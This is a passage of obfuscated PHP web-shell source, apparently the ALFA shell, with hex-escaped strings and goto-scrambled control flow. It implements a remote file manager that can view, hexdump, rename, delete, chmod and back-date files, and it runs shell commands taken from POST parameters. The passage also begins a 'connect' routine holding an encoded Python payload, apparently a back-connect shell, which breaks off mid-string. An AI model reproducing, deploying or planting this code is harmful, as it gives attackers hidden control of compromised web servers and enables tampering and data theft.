"\x3c\144\151\x76\x20\143\154\141\163\x73\x3d\42\145\x64\x69\164\x6f\162\x2d\x76\151\145\x77\x22\x3e\74\144\151\x76\x20\x63\x6c\x61\163\163\x3d\x22\166\x69\145\x77\55\143\x6f\156\x74\145\156\164\x22\x3e\x3c\x74\x61\x62\x6c\145\x20\143\145\x6c\154\x73\x70\x61\143\151\156\x67\75\x31\40\143\145\154\x6c\160\x61\x64\144\x69\x6e\147\x3d\65\40\142\147\143\157\154\x6f\162\x3d\x62\154\141\x63\153\76\74\164\162\x3e\x3c\164\x64\x20\x62\147\x63\x6f\x6c\x6f\162\x3d\x67\x72\x61\171\76\74\163\160\x61\156\40\163\164\x79\x6c\x65\75\x22\x66\x6f\156\164\x2d\x77\145\x69\147\150\x74\72\x20\156\x6f\x72\x6d\x61\154\73\42\76\74\160\x72\145\76" . $h[0] . "\74\x2f\160\162\x65\76\74\x2f\163\160\141\x6e\76\74\57\x74\x64\x3e\x3c\x74\144\40\142\x67\x63\157\154\x6f\162\75\43\62\70\62\x38\x32\x38\76\74\x70\162\145\x3e" . $h[1] . "\x3c\x2f\x70\162\145\x3e\74\x2f\164\x64\76\74\164\x64\x20\142\147\143\x6f\154\157\162\75\43\63\63\x33\63\x33\63\x3e\74\x70\x72\x65\76" . htmlspecialchars($h[2]) . "\x3c\x2f\x70\162\x65\76\74\x2f\164\x64\76\74\x2f\x74\162\76\74\x2f\x74\x61\x62\x6c\145\76\74\57\x64\151\166\x3e\x3c\57\x64\151\x76\x3e"; goto uZkaR; HL3ZU: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\x25\x30\62\130", ord($c[$i])) . "\x20"; switch (ord($c[$i])) { case 0: $h[2] .= "\40"; break; case 9: $h[2] .= "\40"; break; case 10: $h[2] .= "\40"; break; case 13: $h[2] .= "\40"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto fFprH; LxEAs: $h[1] .= "\74\142\x72\x3e"; goto eTt4E; R3Kdd: if ($i + 1 < $len) { $h[0] .= sprintf("\x25\x30\x38\130", $i + 1) . "\x3c\142\x72\x3e"; } goto LxEAs; eTt4E: $h[2] .= "\xa"; goto WZjLy; fFprH: $n = 0; goto R3Kdd; WZjLy: } } goto qOLJP; BDrZ3: $h = array("\60\x30\60\x30\x30\60\x30\60\x3c\142\162\76", '', ''); goto ybzJE; LKaTC: case "\162\145\x6e\141\x6d\x65": goto WZdAq; Cy2q1: echo "\x3c\146\157\162\155\40\157\x6e\x73\x75\142\155\x69\x74\x3d\x22\145\144\x69\164\157\x72\x28\x27" . $alfa1_escape . "\x27\54\x27" . $_POST["\x61\x6c\146\141\x32"] . "\x27\x2c\164\x68\x69\163\56\x6e\141\155\145\x2e\166\x61\154\x75\x65\x2c\x27" . $_POST["\143"] . "\47\x2c\47" . $_POST["\141\x6c\x66\x61\64"] . "\47\54\x27" . $ftype . "\x27\x29\x3b\162\x65\x74\165\162\156\x20\146\x61\x6c\x73\x65\73\x22\x3e\x3c\x69\156\x70\x75\164\x20\164\171\160\x65\75\42\164\145\170\164\42\40\x6e\141\155\x65\x3d\42\x6e\x61\x6d\145\x22\x20\x76\x61\x6c\165\x65\75\x22" . addslashes(htmlspecialchars(isset($_POST["\x61\x6c\146\x61\x33"]) && $_POST["\x61\154\146\x61\63"] != '' ? $_POST["\x61\x6c\146\x61\63"] : $alfa1_decoded)) . "\x22\76\x3c\151\x6e\160\165\x74\40\x74\x79\160\x65\x3d\x73\x75\142\155\x69\164\x20\x76\141\x6c\x75\x65\x3d\42\x20\42\76\x3c\x2f\146\x6f\x72\x6d\76"; goto MGPTC; MGPTC: break; goto zqrrX; UODsG: if (!empty($_POST["\141\x6c\146\x61\63"])) { goto pIXzp; pIXzp: $cmd_rename = false; goto vM_Im; BjMTS: if (!@rename($_POST["\x61\x6c\x66\141\61"], $_POST["\x61\154\146\x61\63"]) && $cmd_rename) { echo "\103\x61\x6e\x27\164\x20\x72\145\x6e\141\x6d\x65\x21\74\142\162\x3e"; } else { echo "\122\145\x6e\x61\x6d\x65\144\41\x3c\x73\x63\x72\151\x70\164\76\x74\x72\x79\173\x24\x28\x22" . $_POST["\x61\154\146\x61\64"] . "\42\x29\56\151\156\x6e\x65\x72\x48\124\x4d\x4c\40\75\x20\42\74\x64\x69\166\x20\143\154\141\x73\163\75\x27\x65\144\x69\164\x6f\x72\x2d\x69\x63\157\156\47\76\42\x2b\x6c\x6f\x61\144\124\171\x70\145\x28\47" . $alfa3_escape . "\47\54\47" . $ftype . "\x27\54\x27" . $_POST["\x61\154\146\141\x34"] . "\x27\x29\x2b\42\x3c\57\144\x69\x76\x3e\x3c\144\x69\166\40\x63\x6c\x61\x73\163\75\47\x65\x64\151\x74\x6f\x72\x2d\146\151\154\145\55\156\141\155\145\47\76" . $alfa3_escape . "\74\57\x64\x69\x76\76\x22\73\145\x64\151\x74\157\162\137\146\x69\x6c\x65\163\x5b\x22" . $_POST["\141\154\146\141\x34"] . "\x22\x5d\56\146\151\x6c\145\x20\75\x20\x22" . $alfa3_escape . "\x22\73\x64\56\x66\x69\154\145\163\x2e\x69\x6e\156\145\162\x48\124\x4d\x4c\40\75\x20\x64\56\x66\x69\x6c\x65\x73\x2e\x69\x6e\156\x65\162\x48\124\x4d\114\x2e\162\145\160\154\141\143\145\50\x2f\134\47" . $alfa1_escape . "\x5c\47\57\147\x2c\40\x22\47" . $alfa3_escape . "\47\42\x29\x3b\144\x2e\146\x69\x6c\x65\x73\x2e\151\x6e\156\x65\x72\110\x54\115\114\x20\75\40\144\56\x66\x69\154\x65\x73\56\151\156\156\145\162\x48\124\115\114\x2e\162\x65\160\154\141\143\145\x28\x2f\166\141\x6c\165\x65\x5c\x3d\x5c\42" . $alfa1_escape . "\134\x22\57\54\40\47\166\141\x6c\165\x65\134\x3d\134\x22" . $alfa3_escape . "\134\42\x27\x29\x3b\144\56\146\x69\x6c\x65\x73\x2e\151\x6e\x6e\x65\x72\110\x54\115\x4c\x20\75\x20\x64\56\146\151\x6c\x65\163\x2e\151\x6e\156\x65\x72\110\124\115\114\x2e\x72\x65\x70\154\x61\x63\145\50\x2f" . $alfa1_escape . "\134\x3c\x5c\x2f\141\134\76\57\x67\54\40\42" . $alfa3_escape . "\x3c\57\x61\76\42\x29\73\144\56\146\151\x6c\145\x73\56\x69\x6e\x6e\145\162\x48\124\x4d\x4c\x20\75\40\144\56\146\151\154\145\163\x2e\x69\x6e\156\x65\x72\110\124\x4d\x4c\x2e\162\x65\x70\x6c\x61\x63\145\50\x2f\101\162\145\x20\131\157\165\x20\123\165\162\x65\40\106\x6f\162\40\x44\145\x6c\145\164\145\x20\x23\x20" . $alfa1_escape . "\x20\43\40\134\x3f\x2f\x2c\x20\42\101\162\x65\40\x59\157\x75\40\123\165\x72\x65\40\x46\x6f\162\40\104\x65\154\145\164\145\40\x23\40" . $alfa3_escape . "\x20\x23\40\x3f\x22\51\73" . ($ftype == "\144\151\x72" ? "\x75\160\144\x61\x74\x65\x44\x69\x72\x73\x45\144\x69\164\x6f\162\x28\x27" . $_POST["\141\154\146\x61\64"] . "\47\x2c\x27" . $alfa1_escape . "\47\51\x3b" : '') . "\175\143\141\x74\143\150\50\x65\51\x7b\x63\x6f\x6e\x73\x6f\154\145\56\154\157\147\50\145\51\x7d\74\x2f\x73\143\x72\x69\x70\x74\x3e"; $alfa1_escape = $alfa3_escape; } goto QyRsG; vM_Im: if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["\x61\154\146\141\x31"])) { $alfa1_escape = addslashes($alfa1_decoded); alfaEx("\x63\x64\40\47" . addslashes($_POST["\x63"]) . "\47\x3b\x6d\166\x20\x27" . $alfa1_escape . "\x27\x20\47" . addslashes($_POST["\x61\154\x66\141\63"]) . "\x27"); } else { $cmd_rename = true; } } else { $alfa1_escape = addslashes($_POST["\x61\154\146\141\61"]); } goto BjMTS; QyRsG: } goto Cy2q1; WZdAq: @chdir($_POST["\x63"]); goto I2_4o; I2_4o: $alfa1_escape = addslashes($_POST["\141\154\146\x61\x31"]); goto mRHIJ; mRHIJ: $alfa3_escape = addslashes($_POST["\x61\x6c\146\x61\63"]); goto UODsG; zqrrX: case "\164\x6f\x75\x63\x68": goto i3376; AJQA6: if (!empty($_POST["\141\154\x66\x61\x33"])) { $time = strtotime($_POST["\141\x6c\146\x61\63"]); if ($time) { goto yyp8d; u9wgU: if ($chdir_fals && $alfa_canruncmd) { alfaEx("\x63\144\40\x27" . addslashes($_POST["\x63"]) . "\47\73\x74\157\x75\x63\x68\40\55\x64\40\47" . htmlspecialchars(addslashes($_POST["\141\154\x66\x61\x33"])) . "\47\40\x27" . addslashes($alfa1_decoded) . "\x27"); $touched = true; } goto wfLmj; yyp8d: $touched = false; goto u9wgU; wfLmj: if (!@touch($_POST["\141\x6c\x66\141\x31"], $time, $time) && !$touched) { echo "\106\141\151\x6c\41"; } else { echo "\124\157\165\x63\x68\x65\144\x21"; } goto tg5Gz; tg5Gz: } else { echo "\102\x61\144\40\x74\151\x6d\x65\40\146\x6f\162\155\141\x74\41"; } } goto zrzHs; L1ZOB: echo "\74\163\143\162\x69\160\x74\x3e\x61\154\x66\141\63\x5f\75\42\42\x3b\74\57\163\x63\162\151\x70\164\76\74\146\x6f\162\x6d\40\157\156\163\165\x62\155\151\164\75\x22\145\x64\x69\164\x6f\x72\x28\x27" . addslashes($_POST["\141\x6c\146\141\x31"]) . "\x27\54\x27" . $_POST["\141\154\x66\x61\x32"] . "\47\x2c\x74\x68\151\x73\x2e\164\157\x75\x63\150\56\166\x61\154\165\145\x2c\x27" . $_POST["\x63"] . "\x27\x2c\47" . $_POST["\x61\154\146\141\x34"] . "\47\54\x27" . $ftype . "\x27\51\73\162\x65\164\165\162\156\40\146\x61\154\163\145\73\42\76\74\x69\156\x70\x75\x74\x20\164\171\160\x65\75\164\145\170\164\x20\156\141\x6d\145\x3d\164\x6f\165\x63\x68\40\166\141\154\x75\145\x3d\x22" . date("\x59\55\155\55\x64\x20\x48\72\151\72\163", $chdir_fals ? $file_info[4] : @filemtime($_POST["\x61\154\146\141\x31"])) . "\42\76\74\151\156\x70\x75\x74\x20\164\171\x70\145\x3d\163\165\142\155\x69\164\x20\x76\141\154\165\x65\x3d\42\40\42\76\74\x2f\146\157\162\155\x3e"; goto jG25O; zrzHs: clearstatcache(); goto L1ZOB; i3376: @chdir($_POST["\x63"]); goto AJQA6; jG25O: break; goto HjSCn; HjSCn: case "\x69\155\141\147\x65": goto AMZsT; R4a0C: $file = $_POST["\141\x6c\x66\141\x31"]; goto QsQIU; zfW0M: break; goto wb0_o; QsQIU: $image_info = @getimagesize($file); goto etpzu; AMZsT: @chdir($_POST["\143"]); goto kZrSf; etpzu: if (is_array($image_info) || $chdir_fals) { goto jQDIO; ISOFZ: if ($width > 800) { $width = 800; } goto gO7By; gO7By: echo $content = "\x3c\x64\x69\166\x20\143\154\141\x73\x73\75\x27\145\x64\x69\x74\x6f\x72\55\166\x69\x65\167\47\x3e\x3c\144\x69\166\40\x63\154\141\163\163\x3d\x27\x76\151\x65\x77\x2d\x63\x6f\x6e\x74\x65\x6e\164\47\x3e\x3c\143\x65\156\164\145\x72\76" . $image_info_h . "\x3c\x62\x72\76\x3c\x69\x6d\x67\40\151\x64\75\x27\166\151\145\167\111\155\x61\x67\145\47\40\x73\x74\x79\154\145\x3d\47\x6d\x61\x78\x2d\x77\x69\144\x74\150\x3a\x31\60\60\x25\x3b\142\157\x72\x64\145\162\72\61\160\x78\40\x73\x6f\154\151\x64\x20\x67\162\x65\x65\x6e\x3b\47\x20\x73\162\143\x3d\x27\144\141\164\x61\x3a" . $image_info["\155\151\155\145"] . "\73\x62\x61\163\145\x36\64\x2c" . $source . "\47\x20\x61\x6c\x74\x3d\x27" . $file . "\x27\76\74\x2f\143\x65\x6e\164\145\162\76\74\x2f\x64\x69\166\76\x3c\57\144\x69\x76\76\74\x62\162\x3e"; goto Q6ktJ; OvwZb: $height = (int) $image_info[1]; goto ie_49; jQDIO: $width = (int) $image_info[0]; goto OvwZb; x4xLL: $image_info_h = "\111\155\141\147\145\40\164\x79\160\145\x20\x3d\40\x3c\163\160\x61\x6e\76\133\x3c\57\x73\x70\141\x6e\x3e\x20" . $image_info["\155\151\x6d\x65"] . "\x20\74\163\x70\141\156\76\x5d\x3c\x2f\163\x70\x61\x6e\76\74\x62\162\x3e\111\155\141\x67\145\x20\123\x69\172\145\x20\75\40\x3c\163\x70\x61\x6e\x3e\133\40\x3c\57\x73\x70\141\x6e\x3e" . $width . "\40\x78\40" . $height . "\x3c\163\160\141\156\x3e\40\135\74\57\163\160\x61\156\x3e\x3c\142\162\x3e"; goto ISOFZ; ie_49: if ($chdir_fals && $alfa_canruncmd) { goto mxUHn; auf58: $image_info["\155\x69\155\145"] = $mime[1]; goto sV26q; FM0kP: list($width, $height) = explode("\x3a", alfaEx("\x69\144\145\156\x74\x69\x66\x79\40\x2d\x66\157\162\155\141\x74\40\x27\x25\x77\72\x25\x68\x27\x20\47" . addslashes($file) . "\47")); goto yx2XD; yx2XD: $mime = explode("\72", alfaEx("\146\x69\x6c\x65\40\x2d\x2d\155\151\155\145\x2d\x74\x79\x70\x65\40\x27" . addslashes($file) . "\x27")); goto auf58; mxUHn: $source = alfaEx("\143\x61\164\40\47" . addslashes($file) . "\x27\x20\x7c\x20\x62\141\x73\145\66\64"); goto FM0kP; sV26q: } else { $source = __ZW5jb2Rlcg(__read_file($file, false)); } goto x4xLL; Q6ktJ: } goto zfW0M; kZrSf: echo "\x3c\x68\x72\76"; goto R4a0C; wb0_o: } goto aHr2T; DwHFu: if (isset($_POST["\141\x6c\146\x61\61"])) { $_POST["\141\x6c\146\x61\61"] = rawurldecode($_POST["\x61\x6c\146\141\x31"]); } goto IdPQl; CHzsD: if (!_alfa_file_exists(@$_POST["\141\x6c\146\x61\x31"])) { goto IS9uI; Pn8L7: alfaFooter(); goto clxaD; clxaD: return; goto FtExd; IS9uI: echo __pre() . "\74\x63\x65\x6e\x74\x65\162\x3e\74\x70\76\74\x64\151\166\x20\x63\x6c\x61\x73\163\75\x22\x74\x78\164\146\157\x6e\164\42\x3e\x3c\146\x6f\x6e\x74\x20\143\157\x6c\157\162\x3d\x27\x72\145\144\x27\76\x21\56\56\x2e\106\111\114\x45\x20\104\x4f\x45\123\x54\x20\x4e\x4f\124\x20\x45\130\111\124\x53\x2e\x2e\x2e\x21\74\x2f\x66\157\156\164\x3e\x3c\x2f\x64\151\x76\x3e\74\x2f\160\x3e\74\57\143\x65\156\x74\x65\x72\x3e\74\x2f\x64\x69\x76\x3e\x3c\x73\x63\162\151\160\x74\x3e\145\144\x69\x74\x6f\162\x5f\145\162\x72\157\162\75\x66\141\x6c\x73\x65\x3b\162\145\155\x6f\166\145\x48\x69\x73\x74\x6f\162\171\50\x27" . $_POST["\x61\154\146\141\64"] . "\x27\x29\x3b\x3c\57\x73\x63\162\151\x70\164\76"; goto Pn8L7; FtExd: } goto SiQmD; CfItJ: $chdir_fals = false; goto xJwV2; UCqV4: if (empty($_POST["\141\154\146\141\62"])) { $_POST["\141\x6c\x66\141\62"] = "\166\151\x65\x77"; } goto C92O3; seBk0: echo "\x3c\x73\160\x61\x6e\x20\x63\154\141\163\163\75\42\x65\144\x69\164\x6f\x72\x5f\146\151\x6c\145\137\151\156\146\x6f\137\x76\141\x72\x73\42\x3e\x4e\x61\155\x65\x3a\x3c\x2f\x73\x70\x61\156\76\40" . htmlspecialchars($alfa1_decoded) . "\x20\74\163\160\x61\x6e\40\x63\x6c\x61\163\163\x3d\x22\x65\x64\151\164\x6f\x72\137\x66\x69\x6c\x65\x5f\x69\x6e\x66\157\137\166\x61\x72\163\42\76\x53\151\x7a\x65\72\74\x2f\163\160\141\156\76\x20" . alfaSize($filesize) . "\x20\74\163\160\x61\156\x20\143\x6c\x61\x73\x73\75\42\145\144\151\164\157\162\137\x66\151\x6c\145\137\x69\x6e\x66\x6f\x5f\x76\141\162\x73\x22\x3e\120\x65\x72\x6d\x69\x73\163\x69\x6f\x6e\72\74\57\x73\x70\x61\x6e\76\x20" . $permcolor . "\40\x3c\x73\x70\x61\x6e\40\143\x6c\x61\163\x73\75\x22\x65\x64\151\164\x6f\162\x5f\146\x69\x6c\145\x5f\x69\156\x66\157\x5f\166\x61\162\163\42\x3e\x4f\x77\156\145\x72\x2f\x47\x72\157\165\x70\x3a\74\x2f\x73\160\141\156\76\40" . $uid["\x6e\x61\155\145"] . "\x2f" . $gid["\x6e\x61\x6d\145"] . "\40\x3c\163\160\141\156\x20\143\x6c\x61\x73\x73\75\42\x65\x64\x69\164\x6f\x72\137\146\151\x6c\145\x5f\x69\x6e\146\x6f\x5f\166\141\x72\163\x22\76\104\x69\162\x65\143\164\157\162\171\72\x3c\x2f\163\160\141\x6e\76\40" . str_replace("\x2f\57", "\x2f", ($chdir_fals ? '' : $_POST["\x63"] . "\x2f") . $_POST["\141\x6c\146\141\x31"]) . "\74\x62\162\76\74\142\162\76"; goto UCqV4; C92O3: if (!_alfa_is_dir($_POST["\x61\154\146\141\61"])) { $m = array("\x56\151\145\x77", "\105\144\x69\x74", "\104\157\167\x6e\x6c\x6f\x61\x64", "\x48\x69\147\x68\154\151\x67\150\164", "\103\150\155\157\x64", "\122\x65\156\141\x6d\145", "\x54\x6f\x75\143\150", "\x44\145\x6c\x65\x74\x65", "\111\155\141\147\145", "\x48\145\170\144\x75\155\x70"); $ftype = "\x66\151\154\x65"; } else { $m = array("\103\150\x6d\x6f\x64", "\x52\x65\156\141\x6d\145", "\124\x6f\165\143\x68"); $ftype = "\x64\151\162"; } goto s9C_D; QwnXn: if ($_POST["\x61\154\x66\141\x32"] == "\x72\x65\156\x61\x6d\145" && !empty($_POST["\x61\154\x66\x61\63"]) && @is_writable($_POST["\x61\x6c\146\141\x31"])) { $rename_cache = $_POST["\141\154\146\141\x33"]; } goto aSU3s; aSU3s: if (@$_POST["\x61\154\146\141\62"] == "\x6d\153\146\151\154\145") { goto Swazw; aB9hL: if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["\x63"])) { alfaEx("\x63\144\x20\47" . addslashes($_POST["\143"]) . "\x27\x3b\164\x6f\x75\143\x68\x20\x27" . addslashes($alfa1_decoded) . "\47"); $_POST["\x61\154\146\141\x32"] = "\145\x64\151\x74"; } } goto jt7Z4; jt7Z4: if (!@file_exists($_POST["\141\154\x66\x61\x31"])) { $fp = @fopen($_POST["\x61\x6c\x66\x61\61"], "\x77"); if ($fp) { $_POST["\141\x6c\146\x61\62"] = "\145\x64\151\164"; fclose($fp); } } else { $_POST["\141\154\146\x61\x32"] = "\145\x64\151\x74"; } goto g6hNt; Swazw: $_POST["\x61\154\146\x61\x31"] = trim($_POST["\141\154\146\141\61"]); goto aB9hL; g6hNt: } goto CHzsD; ClaEI: alfahead(); goto SA7WK; Yh3Ne: if ($_POST["\x61\154\146\x61\x32"] == "\x61\x75\x74\157") { if (is_array(@getimagesize($_POST["\x61\x6c\146\141\61"]))) { $_POST["\x61\x6c\146\141\x32"] = "\x69\x6d\141\147\x65"; } else { $_POST["\x61\x6c\x66\x61\x32"] = "\166\x69\145\167"; if ($chdir_fals) { if ($alfa_canruncmd) { goto G2oIu; GykT4: $mimetype = $mime[1]; goto k0Dgs; k0Dgs: if (!empty($mimetype)) { if (strstr($mimetype, "\151\x6d\141\x67\145")) { $_POST["\141\154\x66\141\62"] = "\151\155\x61\x67\x65"; } } goto kTC1t; G2oIu: $mime = explode("\x3a", alfaEx("\x66\151\x6c\145\40\55\55\155\x69\x6d\x65\55\164\171\x70\x65\40\x27" . addslashes($_POST["\141\154\146\141\61"]) . "\x27")); goto GykT4; kTC1t: } } } } goto QwnXn; IdPQl: $alfa1_decoded = $_POST["\x61\154\146\141\61"]; goto CfItJ; SA7WK: echo "\x3c\144\151\x76\40\x63\x6c\x61\163\x73\75\x22\146\151\154\145\x73\164\157\157\x6c\163\42\x3e"; goto DwHFu; H9fAs: alfaFooter(); goto x_0cA; s9C_D: foreach ($m as $v) { echo $v == "\x44\x65\x6c\x65\164\145" ? "\x3c\141\40\x68\162\x65\x66\x3d\x22\152\x61\x76\141\163\x63\x72\x69\x70\164\x3a\166\x6f\151\x64\x28\60\x29\x3b\42\40\157\156\143\154\151\143\x6b\x3d\42\x76\x61\162\40\x63\x68\x6b\x3d\x63\157\156\146\151\x72\x6d\50\x27\x41\162\145\x20\x59\157\165\x20\x53\x75\x72\145\x20\106\x6f\162\x20\x44\x65\x6c\145\164\x65\40\x54\x68\x69\163\x20\106\151\154\x65\40\x3f\x27\51\x3b\x63\x68\x6b\77\145\x64\151\164\157\x72\50\x27" . addslashes(!isset($rename_cache) ? $_POST["\x61\x6c\146\141\x31"] : $rename_cache) . "\x27\54\47" . strtolower($v) . "\x27\54\x27\47\x2c\47" . $_POST["\143"] . "\x27\x2c\x27" . $_POST["\141\154\146\x61\64"] . "\47\x2c\x27" . $ftype . "\x27\x29\72\x27\47\73\42\x3e\74\x73\x70\x61\156\40\143\x6c\141\x73\163\75\42\145\144\151\x74\x6f\162\x5f\x61\x63\x74\151\x6f\x6e\x73\x22\76" . (strtolower($v) == @$_POST["\x61\x6c\146\141\62"] ? "\74\x62\76\74\163\160\141\156\x20\143\x6c\x61\163\163\x3d\42\145\x64\151\x74\157\x72\137\x61\143\x74\151\157\x6e\163\x22\76\40" . $v . "\x20\74\57\x73\160\x61\156\76\x20\x3c\x2f\x62\76" : $v) . "\x20\174\40\x3c\57\x73\160\x61\x6e\x3e\74\57\x61\76\40" : "\x3c\141\x20\x68\162\x65\146\x3d\x22\x6a\141\166\141\x73\x63\162\151\x70\x74\72\x76\157\x69\144\50\60\51\73\x22\40\157\x6e\x63\154\151\143\x6b\75\42\145\x64\151\x74\157\x72\x28\47" . addslashes(!isset($rename_cache) ? $_POST["\141\x6c\x66\x61\x31"] : $rename_cache) . "\x27\54\47" . strtolower($v) . "\47\x2c\47\47\54\x27" . $_POST["\x63"] . "\47\x2c\47" . $_POST["\141\x6c\146\141\64"] . "\x27\54\47" . $ftype . "\x27\x29\x22\x3e\74\x73\160\x61\x6e\x20\x63\154\x61\x73\x73\x3d\42\145\144\x69\x74\x6f\162\137\141\143\x74\x69\x6f\156\x73\x22\x3e" . (strtolower($v) == @$_POST["\141\x6c\146\141\62"] ? "\74\x62\76\74\x73\x70\x61\156\x20\x63\154\x61\x73\x73\x3d\x22\145\144\151\164\157\162\137\x61\x63\x74\151\157\156\163\42\76\x20" . $v . "\x20\x3c\x2f\163\160\141\x6e\x3e\40\x3c\x2f\x62\76" : $v) . "\x20\174\x20\74\x2f\163\160\141\x6e\76\x3c\57\x61\76"; } goto klAM2; klAM2: echo "\74\142\162\76\74\142\x72\x3e"; goto z81PZ; xJwV2: if (!@chdir($_POST["\x63"])) { goto wHisA; ScvlW: $alfa_canruncmd = _alfa_can_runCommand(true, true); goto gNUcp; gNUcp: if ($alfa_canruncmd) { goto XOVtM; ekO59: $file_info = explode("\x3a", alfaEx("\x73\x74\x61\x74\x20\55\x63\40\42\45\106\x3a\x25\125\x3a\x25\x47\72\x25\163\x3a\45\131\x3a\x30\45\141\x3a\45\x41\x22\x20\x22" . $slashed_alfa1 . "\42")); goto gyGb7; XOVtM: $slashed_alfa1 = addslashes($_POST["\141\154\146\x61\61"]); goto ekO59; gyGb7: $perm_color_class = alfaEx("\x69\x66\40\133\133\40\55\x77\x20\47" . $slashed_alfa1 . "\x27\x20\135\x5d\73\40\164\x68\x65\x6e\40\145\x63\150\x6f\x20\155\141\x69\x6e\x5f\x67\162\145\x65\x6e\x5f\160\x65\x72\155\73\40\x65\x6c\x69\x66\x20\x5b\133\40\x2d\x72\40\x27" . $slashed_alfa1 . "\x27\x20\135\135\x3b\x20\164\x68\x65\x6e\40\145\x63\x68\x6f\40\x6d\x61\x69\x6e\x5f\167\x68\x69\164\145\137\160\x65\x72\155\73\40\x65\x6c\163\x65\40\x65\143\150\157\40\x6d\x61\x69\x6e\137\162\x65\144\137\x70\x65\x72\x6d\73\x20\x66\151"); goto Cy4tj; Cy4tj: } goto lnXcZ; wHisA: $chdir_fals = true; goto ekaWN; ekaWN: $_POST["\x61\x6c\146\141\61"] = $_POST["\x63"] . "\57" . $_POST["\x61\154\x66\141\x31"]; goto ScvlW; lnXcZ: } goto Yh3Ne; aHr2T: echo "\x3c\x2f\144\x69\x76\76"; goto H9fAs; SiQmD: if ($chdir_fals) { goto ezLQ_; FYZk8: $gid["\x6e\x61\155\x65"] = $file_info[2]; goto k9W4C; ezLQ_: $filesize = $file_info[3]; goto o3vBM; k9W4C: $permcolor = alfaPermsColor(array("\x63\x6c\141\163\x73" => $perm_color_class, "\x6e\x75\155" => $file_info[5], "\x68\165\155\x61\156" => $file_info[6]), true); goto RnoWj; o3vBM: $uid["\156\x61\155\x65"] = $file_info[1]; goto FYZk8; RnoWj: } else { goto gYQ46; zLcat: $filesize = @filesize($_POST["\141\x6c\146\x61\61"]); goto XhEnB; OCeev: $permcolor = alfaPermsColor($_POST["\141\154\146\141\61"]); goto zLcat; yP_bS: $gid = function_exists("\160\x6f\x73\151\x78\137\x67\145\164\147\162\x67\151\144") && function_exists("\146\151\x6c\145\147\x72\x6f\x75\x70") ? @posix_getgrgid(@filegroup($_POST["\141\x6c\146\141\61"])) : ''; goto pC4df; pC4df: if (!$uid && !$gid) { $uid["\156\x61\155\145"] = function_exists("\146\x69\x6c\x65\x6f\167\156\x65\162") ? @fileowner($_POST["\141\154\x66\141\x31"]) : ''; $gid["\156\x61\155\145"] = function_exists("\x66\x69\x6c\x65\147\x72\x6f\165\x70") ? @filegroup($_POST["\141\x6c\x66\x61\61"]) : ''; } goto OCeev; gYQ46: $uid = function_exists("\x70\157\163\x69\x78\x5f\x67\145\164\160\167\x75\x69\144") && function_exists("\146\151\x6c\x65\x6f\x77\x6e\145\162") ? @posix_getpwuid(@fileowner($_POST["\141\154\146\x61\61"])) : ''; goto yP_bS; XhEnB: if (!isset($uid["\156\141\155\145"], $gid["\x6e\141\x6d\145"]) || empty($uid["\x6e\141\155\145"]) || empty($gid["\156\x61\155\x65"])) { if (_alfa_can_runCommand()) { list($uid["\156\141\155\145"], $gid["\x6e\x61\x6d\145"]) = explode("\x3a", alfaEx("\x73\164\x61\164\40\55\143\x20\42\45\125\x3a\x25\107\42\x20\42" . addslashes($_POST["\143"] . "\57" . $_POST["\141\x6c\x66\141\61"]) . "\42")); } } goto C25Ot; C25Ot: } goto seBk0; x_0cA: } goto SIiKg; iXJiQ: @session_start(); goto mMKnX; UqiuZ: function alfaconnect() { goto Kax0T; fPWIo: $python = "\x70\126\122\164\x54\x39\163\167\x45\120\66\x63\123\166\60\x50\x78\160\164\127\x52\70\x30\x4d\x37\x59\x59\60\x77\x59\112\x55\121\132\x6a\x51\x42\x6c\122\164\x70\63\60\101\126\161\130\117\160\131\155\127\117\160\110\164\x51\x50\156\x43\x62\x35\x2f\x74\112\x47\x31\101\x48\x55\113\x61\161\162\x61\53\x56\71\71\x7a\71\65\172\x66\x37\x65\x32\130\125\x75\x77\x76\x55\162\x34\120\57\x42\64\x56\152\171\x72\112\x65\142\145\x54\162\157\x70\x63\x4b\103\124\101\x6b\x2b\x57\151\105\104\153\104\x4b\142\x31\143\145\x76\112\x52\146\x33\120\62\x42\65\x53\156\x30\150\126\x30\117\64\127\120\143\142\x65\124\62\x4e\x38\111\131\x69\121\x54\171\104\114\103\x33\113\x4e\165\x78\x7a\106\x78\x2f\x6a\141\145\152\166\115\103\x4f\107\x47\x65\x39\x66\106\156\157\164\124\x5a\126\x5a\x53\130\x36\160\156\124\170\x54\147\x77\x61\150\x42\x69\154\x7a\162\x6c\x4c\x37\127\x75\x76\x6b\x6d\x41\113\147\126\x48\x52\x6b\62\x72\x6c\106\x52\101\107\102\107\x33\x33\x36\x68\x30\165\x70\132\x71\126\123\x6a\x69\x55\x75\101\163\152\64\x44\x30\x53\x68\x56\57\x2f\116\x4c\124\145\123\157\111\x49\x56\x4e\x70\x7a\155\x73\115\141\x59\x78\x79\123\130\155\x34\x67\152\60\x66\x63\64\127\x4e\x7a\157\x6c\71\x52\x75\115\60\x41\x35\64\124\x63\67\165\x6a\120\130\x52\x6a\x46\113\x77\111\x68\162\126\164\x33\x43\x79\131\x58\120\x70\x72\x42\x57\112\61\x50\x4a\x34\117\57\116\67\67\70\x61\53\172\153\71\x35\170\x62\x64\127\x71\x59\x39\x74\x79\155\x61\x43\x50\113\x66\162\66\x41\146\x65\154\105\x69\x52\62\x2b\170\x69\x64\x74\x49\130\150\126\152\111\x58\121\123\142\x42\x46\166\103\x51\66\x4e\x75\x52\66\x61\101\126\110\x53\125\145\161\64\115\152\x64\107\153\x43\62\x44\x30\x5a\110\x41\167\57\165\172\x51\x43\103\x78\x46\142\151\116\x67\127\x36\70\x43\x61\x51\141\x46\x71\x2f\171\x4b\x55\163\164\111\62\x75\122\62\x44\x57\127\x4d\x6a\x77\x6a\x30\x35\x71\x44\130\x4f\x77\x68\x64\101\x4a\131\123\103\112\121\x53\x7a\66\102\x61\122\x6d\71\53\63\x38\x71\67\x76\131\153\71\x34\x63\x52\x59\x75\160\x58\107\64\x2b\x48\x5a\x31\x50\121\x6c\117\122\71\120\101\162\x65\x4e\60\x71\153\127\124\157\x2b\x35\154\x45\141\161\105\x70\152\x4a\113\x42\x56\156\x51\x70\x63\152\114\x67\147\170\x63\144\x2b\x4e\x6b\155\x73\x6d\x53\x46\71\142\107\x71\x45\143\x4a\120\103\114\57\155\x6d\x44\152\x31\x38\x4b\151\x38\x78\x6c\x2b\x57\126\131\x4b\164\x31\x31\112\x71\x56\104\x49\111\64\